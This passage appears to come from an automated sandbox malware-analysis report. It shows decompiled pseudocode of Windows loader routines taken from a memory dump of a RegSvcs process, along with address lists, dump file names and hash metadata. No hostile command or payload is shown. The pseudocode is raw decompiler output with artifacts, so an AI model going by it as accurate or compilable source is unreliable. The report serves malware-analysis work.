										_t200 = E00FBF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E00FFB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x10ab2f8; // 0x0
									if((_t206 |  *0x10ab2fc) == 0 || ( *0x10ab2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x10ab2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E01066B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E01066AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E00FCE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L00FCEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E00FF9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E00FCE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L00FC8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00FF3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x00fcd5f2
0x00fcd5f5
0x00fcd5f5
0x00fcd5fd
0x00fcd600
0x00fcd60a
0x00fcd60d
0x00fcd617
0x00fcd61d
0x00fcd627
0x00fcd62e
0x00fcd911
0x00fcd913
0x00000000
0x00fcd919
0x00fcd919
0x00fcd919
0x00fcd634
0x00fcd634
0x00fcd634
0x00fcd634
0x00fcd640
0x00fcd8bf
0x00000000
0x00fcd646
0x00fcd646
0x00fcd64d
0x00fcd652
0x0101b2fc
0x0101b2fc
0x0101b302
0x0101b33b
0x0101b341
0x00000000
0x0101b304
0x0101b304
0x0101b319
0x0101b31e
0x0101b324
0x0101b326
0x0101b332
0x0101b347
0x0101b34c
0x0101b351
0x0101b35a
0x00000000
0x0101b328
0x0101b328
0x00000000
0x0101b328
0x0101b326
0x00fcd658
0x00fcd658
0x00fcd65b
0x00fcd665
0x00000000
0x00fcd66b
0x00fcd66b
0x00fcd66b
0x00fcd66b
0x00fcd66d
0x00fcd672
0x00fcd67a
0x00000000
0x00000000
0x00fcd680
0x00fcd686
0x00fcd8ce
0x00fcd8d4
0x00fcd8da
0x00fcd8dd
0x00fcd8dd
0x00fcd8e0
0x00fcd68c
0x00fcd691
0x00fcd69d
0x00fcd6a2
0x00fcd6a7
0x00fcd6b0
0x00fcd6b0
0x00fcd6b5
0x00fcd6e0
0x00fcd6b7
0x00fcd6b7
0x00fcd6b9
0x00fcd6b9
0x00fcd6bb
0x00fcd6bd
0x00fcd6ce
0x00fcd6d0
0x00fcd6d2
0x0101b363
0x0101b365
0x00000000
0x0101b36b
0x00000000
0x0101b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00fcd6bf
0x00fcd6bf
0x00fcd6e5
0x00fcd6e7
0x00fcd6e9
0x00fcd6e9
0x00fcd6ec
0x00fcd6ec
0x00fcd6ef
0x00fcd6f5
0x00fcd6f9
0x00fcd6fb
0x00fcd6fd
0x00fcd701
0x00fcd703
0x00fcd70a
0x00fcd70a
0x00fcd70a
0x00fcd701
0x00fcd70d
0x00fcd710
0x00fcd710
0x00fcd6c1
0x00fcd6c1
0x00fcd6c1
0x00fcd6c6
0x0101b36d
0x0101b36f
0x00000000
0x0101b375
0x0101b375
0x0101b375
0x00000000
0x0101b375
0x00000000
0x00fcd6cc
0x00fcd6d8
0x00fcd6d8
0x00fcd6d8
0x00000000
0x00fcd6c6
0x00fcd6bf
0x00000000
0x00fcd6da
0x00fcd6da
0x00fcd716
0x00fcd71b
0x00fcd720
0x00fcd726
0x00fcd726
0x00fcd72d
0x00000000
0x00fcd733
0x00fcd739
0x00fcd742
0x00fcd750
0x00fcd758
0x00fcd764
0x00fcd776
0x00fcd77a
0x00fcd783
0x00fcd928
0x00fcd92c
0x00fcd93d
0x00fcd944
0x00fcd94f
0x00fcd954
0x00fcd956
0x00fcd95f
0x00fcd961
0x00fcd973
0x00fcd973
0x00fcd956
0x00fcd944
0x00fcd92c
0x00fcd78b
0x0101b394
0x00fcd791
0x00fcd798
0x0101b3a3
0x0101b3bb
0x0101b3bb
0x00fcd7a5
0x00fcd866
0x00fcd870
0x00fcd884
0x00fcd892
0x00fcd898
0x00fcd89e
0x00fcd8a0
0x00fcd8a6
0x00fcd8ac
0x00fcd8ae
0x00fcd8b4
0x00fcd8b4
0x00fcd8ae
0x00fcd7a5
0x00fcd78b
0x00fcd7b1
0x0101b3c5
0x0101b3c5
0x00fcd7c3
0x00fcd7ca
0x00fcd7e5
0x00fcd7eb
0x00fcd8eb
0x00fcd8ed
0x00000000
0x00fcd8f3
0x00fcd8f3
0x00fcd8f3
0x00000000
0x00fcd8ed
0x00fcd7cc
0x00fcd7cc
0x00fcd7d2
0x00000000
0x00fcd7d4
0x00fcd7d4
0x00fcd7d7
0x00fcd7df
0x0101b3d4
0x0101b3d9
0x0101b3dc
0x0101b3dc
0x0101b3df
0x0101b3e2
0x0101b468
0x0101b46d
0x0101b46f
0x0101b46f
0x0101b475
0x00fcd8f8
0x00fcd8f9
0x00fcd8fd
0x0101b3e8
0x0101b3e8
0x0101b3eb
0x0101b3ed
0x00000000
0x0101b3ef
0x0101b3ef
0x0101b3f1
0x0101b3f4
0x0101b3fe
0x0101b404
0x0101b409
0x0101b40e
0x0101b410
0x0101b410
0x0101b414
0x0101b414
0x0101b41b
0x0101b420
0x0101b423
0x0101b425
0x0101b427
0x0101b42a
0x0101b42d
0x0101b42d
0x0101b42a
0x0101b432
0x0101b436
0x0101b438
0x0101b43b
0x0101b43b
0x0101b449
0x0101b44e
0x0101b454
0x0101b458
0x0101b458
0x0101b45d
0x00000000
0x0101b45d
0x0101b3ed
0x00000000
0x00000000
0x00000000
0x00fcd7df
0x00fcd7d2
0x00fcd7ca
0x0101b37c
0x0101b37e
0x0101b385
0x0101b38a
0x00000000
0x0101b38a
0x00fcd742
0x00fcd7f1
0x00fcd7f8
0x0101b49b
0x0101b49b
0x00fcd800
0x00fcd837
0x00fcd843
0x00fcd845
0x00fcd847
0x00fcd84a
0x00fcd84b
0x00fcd84e
0x00fcd857
0x00fcd802
0x00fcd802
0x00fcd80d
0x00000000
0x00fcd818
0x00fcd818
0x00fcd824
0x00fcd831
0x0101b4a5
0x0101b4ab
0x0101b4b3
0x0101b4b8
0x0101b4bb
0x00000000
0x0101b4c1
0x0101b4c1
0x0101b4c8
0x00000000
0x0101b4ce
0x0101b4d4
0x0101b4e1
0x0101b4e3
0x0101b4e5
0x00000000
0x0101b4eb
0x0101b4f0
0x0101b4f2
0x00fcdac9
0x00fcdacc
0x00fcdacf
0x00fcdad1
0x00fcdd78
0x00fcdd78
0x00fcdcf2
0x00000000
0x00fcdad7
0x00fcdad9
0x00fcdadb
0x00000000
0x00000000
0x00fcdae1
0x00fcdae1
0x00fcdae4
0x00fcdae6
0x0101b4f9
0x0101b4f9
0x0101b500
0x00fcdaec
0x00fcdaec
0x00fcdaf5
0x00fcdaf8
0x00fcdafb
0x00fcdb03
0x00fcdb11
0x00fcdb16
0x00fcdb19
0x00fcdb1b
0x0101b52c
0x0101b531
0x0101b534
0x00fcdb21
0x00fcdb21
0x00fcdb24
0x00fcdcd9
0x00fcdce2
0x00fcdce5
0x00fcdd6a
0x00fcdd6d
0x00000000
0x00fcdd73
0x0101b51a
0x0101b51c
0x0101b51f
0x0101b524
0x00000000
0x0101b524
0x00fcdce7
0x00fcdce7
0x00fcdce7
0x00000000
0x00fcdce7
0x00000000
0x00fcdb2a
0x00fcdb2c
0x00fcdb31
0x00fcdb33
0x00fcdb36
0x00fcdb39
0x00fcdb3b
0x00fcdb66
0x00fcdb66
0x00fcdb3d
0x00fcdb3d
0x00fcdb3e
0x00fcdb46
0x00fcdb47
0x00fcdb49
0x00fcdb4c
0x00fcdb53
0x00fcdb55
0x00fcdb58
0x00fcdb5a
0x0101b50a
0x0101b50f
0x0101b512
0x00fcdb60
0x00fcdb60
0x00fcdb63
0x00fcdb63
0x00000000
0x00fcdb63
0x00fcdb5a
0x00fcdb3b
0x00fcdb24
0x00fcdb69
0x00fcdb69
0x00fcdb6c
0x00fcdb6f
0x00fcdb74
0x0101b557
0x0101b557
0x0101b55e
0x00fcdb7a
0x00fcdb7c
0x00fcdb7f
0x00fcdb82
0x00fcdb85
0x00000000
0x00fcdb8b
0x00fcdb8b
0x00fcdb8d
0x00fcdb9b
0x00fcdb9b
0x00fcdb9d
0x00fcdba0
0x00fcdba2
0x00fcdba4
0x00fcdba7
0x00fcdba9
0x00fcdbae
0x00fcdbae
0x00fcdbb1
0x00fcdbb4
0x00fcdbb4
0x00fcdbb7
0x00fcdbba
0x00fcdcd2
0x00fcdcd4
0x00000000
0x00fcdbc0
0x00fcdbc0
0x00fcdbd2
0x00fcdbd7
0x00fcdbda
0x00fcdbdd
0x00fcdbdf
0x00000000
0x00fcdbe5
0x00fcdbe5
0x00fcdbee
0x00fcdbf1
0x0101b541
0x0101b544
0x00000000
0x0101b546
0x0101b546
0x00000000
0x0101b546
0x00fcdbf7
0x00fcdbf7
0x00fcdbfd
0x00fcdbfd
0x00fcdbff
0x00fcdc0b
0x00fcdc15
0x00fcdc1b
0x00fcdc1d
0x00fcdc21
0x00fcdc21
0x00fcdc23
0x00fcdc23
0x00fcdc26
0x00fcdc29
0x00fcdc2b
0x00000000
0x00000000
0x00fcdc31
0x00fcdc34
0x00fcdc36
0x00fcdcbf
0x00fcdcbf
0x00fcdcc2
0x00000000
0x00fcdc3c
0x00fcdc41
0x00fcdc43
0x00000000
0x00fcdc45
0x00fcdc45
0x00fcdc47
0x00000000
0x00fcdc4d
0x00fcdc4d
0x00fcdc50
0x00fcdc52
0x00fcdc55
0x00fcdcfa
0x00fcdcfe
0x00fcdd08
0x00fcdd0a
0x00fcdd0c
0x00000000
0x00fcdd12
0x00fcdd15
0x00fcdd2d
0x00fcdd2f
0x00fcdd32
0x00fcdd35
0x00000000
0x00fcdd35
0x00fcdc5b
0x00fcdc5b
0x00fcdc5e
0x00fcdc61
0x00fcdc64
0x00fcdc67
0x00fcdc67
0x00fcdc6a
0x00fcdc6c
0x00fcdc8e
0x00fcdc8e
0x00fcdc91
0x00fcdc93
0x00fcdcce
0x00fcdcce
0x00fcdc95
0x00fcdc9c
0x00fcdc6e
0x00fcdc72
0x00fcdc75
0x00fcdc77
0x00fcdc79
0x0101b551
0x0101b551
0x00000000
0x00fcdc7f
0x00fcdc7f
0x00fcdc81
0x00000000
0x00fcdc83
0x00fcdc86
0x00fcdc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00fcdc88
0x00fcdc81
0x00fcdc79
0x00fcdc6c
0x00fcdc55
0x00fcdc47
0x00fcdc43
0x00000000
0x00fcdc36
0x00fcdc23
0x00000000
0x00fcdbff
0x00fcdbf1
0x00fcdbdf
0x00fcdb8f
0x00fcdb92
0x00fcdb95
0x00000000
0x00000000
0x00000000
0x00000000
0x00fcdb95
0x00fcdb8d
0x00fcdb85
0x00fcdb74
0x00fcdc9f
0x00fcdca2
0x00fcdcb0
0x00fcdcb0
0x00fcdad1
0x0101b4e5
0x0101b4c8
0x00000000
0x00000000
0x00000000
0x00fcd831
0x00fcd80d
0x00000000
0x00fcd800
0x0101b47f
0x0101b485
0x00000000
0x0101b485
0x00fcd665
0x00fcd652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 00FCD898

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 68bedd94c54b72397a21504fc068efffa7854fd855ddb953ab201ed0a82df70f
Instruction ID: b6c0035e978e34d5b016cfb7209de749001dd9ff36d297ef1f3a18a2b9374b45
Opcode Fuzzy Hash: 68bedd94c54b72397a21504fc068efffa7854fd855ddb953ab201ed0a82df70f
Instruction Fuzzy Hash: 71E1D331A0035A8FEB34DF28CA41F6DB7B1BF45314F1441ADE9499B291DB389D81EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00FE513A Relevance: 1.8, APIs: 1, Instructions: 258
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00FE513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x10ad360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E00FFD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E00FD2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L00FD4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E00FFF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E00FCFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x10ab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E00FFB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x00fe5142
0x00fe514c
0x00fe5150
0x00fe5157
0x00fe5159
0x00fe515e
0x00fe5165
0x00fe5169
0x00fe516c
0x00fe5172
0x00fe5176
0x00fe517a
0x00fe517a
0x00fe517a
0x00fe517f
0x01026d8b
0x01026d8e
0x01026d91
0x01026d95
0x01026d98
0x01026d9c
0x01026da0
0x01026da3
0x01026da7
0x01026e26
0x01026e26
0x01026e2a
0x00fe51f9
0x00fe51f9
0x00fe51fe
0x01026e33
0x01026e33
0x01026e39
0x01026e3d
0x01026e46
0x01026e50
0x00000000
0x00000000
0x01026e52
0x01026e53
0x01026e56
0x01026e5d
0x00000000
0x00000000
0x00000000
0x01026e5f
0x01026e67
0x01026e77
0x01026e7f
0x01026e80
0x01026e88
0x01026e90
0x01026e9f
0x01026ea5
0x01026ea9
0x01026eb1
0x01026ebf
0x00000000
0x00000000
0x01026ecf
0x01026ed3
0x00000000
0x00000000
0x01026edb
0x01026ede
0x01026ee1
0x01026ee8
0x01026eeb
0x01026eed
0x01026ef0
0x01026ef4
0x01026ef8
0x01026efc
0x00000000
0x00000000
0x01026f0d
0x01026f11
0x01026f32
0x01026f37
0x01026f3b
0x01026f3e
0x01026f41
0x01026f46
0x00000000
0x00000000
0x01026f4c
0x01026f50
0x01026f50
0x01026f54
0x01026f62
0x01026f65
0x01026f6d
0x01026f7b
0x01026f7b
0x01026f93
0x01026f98
0x01026fa0
0x01026fa6
0x01026fb3
0x01026fb6
0x01026fbf
0x01026fc1
0x01026fd5
0x01026fda
0x01026fda
0x01026fdd
0x01026fe2
0x01026fe7
0x01026feb
0x01026fef
0x01026ff3
0x00fe520c
0x00fe520c
0x00fe520f
0x00fe5215
0x00fe5234
0x00fe523a
0x00fe523a
0x00fe5244
0x00fe5245
0x00fe5246
0x00fe5251
0x00fe5251
0x01026f13
0x01026f17
0x01026f17
0x01026f18
0x01026f1b
0x01026f1f
0x01026f23
0x00000000
0x01026f28
0x00fe5204
0x00fe5204
0x00fe5208
0x00000000
0x00fe5208
0x00fe5185
0x00fe5188
0x00fe518a
0x00fe518e
0x00fe5195
0x01026db1
0x01026db5
0x01026db9
0x00fe519b
0x00fe519b
0x00fe519e
0x00fe51a7
0x00fe51a9
0x00fe51a9
0x00fe51b5
0x00fe51b8
0x00fe51bb
0x00fe51be
0x00fe51c1
0x00fe51c5
0x00fe51c9
0x00fe51cd
0x00fe51cd
0x00fe51d8
0x00fe51dc
0x00fe51e0
0x01026dcc
0x01026dd0
0x01026dd5
0x01026ddd
0x01026de1
0x01026de1
0x01026de5
0x01026deb
0x01026df1
0x01026df7
0x01026dfd
0x01026e01
0x01026e05
0x01026e09
0x01026e0d
0x01026e11
0x01026e11
0x00fe51eb
0x01026e1a
0x01026e1f
0x01026e21
0x01026e23
0x00000000
0x00fe51f1
0x00fe51f1
0x00000000
0x00fe51f1

APIs

RtlDebugPrintTimes.NTDLL ref: 00FE5234

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
